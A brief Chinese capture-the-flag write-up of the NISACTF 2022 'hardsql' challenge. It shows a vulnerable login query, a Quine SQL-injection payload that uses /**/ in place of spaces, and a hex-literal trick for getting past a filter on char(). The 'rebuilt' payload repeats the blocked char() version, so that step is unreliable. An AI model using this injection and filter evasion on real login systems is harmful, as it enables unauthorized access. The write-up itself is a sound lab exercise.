[NISACTF 2022]hardsql
打开是一个登录框,注入测试发现: 空格被过滤用/**/代替
根据题目描述:
$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";
发现是Quine注入
{
Quine注入构造payload详见Quine-[第五空间 2021]yet_another_mysql_injection_qq_74426248的博客-CSDN博客
}
构造payload:
'/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#',char(34),char(39)),char(66),'"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#')#
显示:waf here
猜测是char被过滤
char 和chr等价
//重新构造playload
//playload '/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#',char(34),char(39)),char(66),'"/**/union/**/select/**/replace(replace("B",char(34),char(39)),char(66),"B")#')#
hardsql中char函数被禁,可以用十六进制绕过
char(34) ---> 0x22
char(39) --> 0x27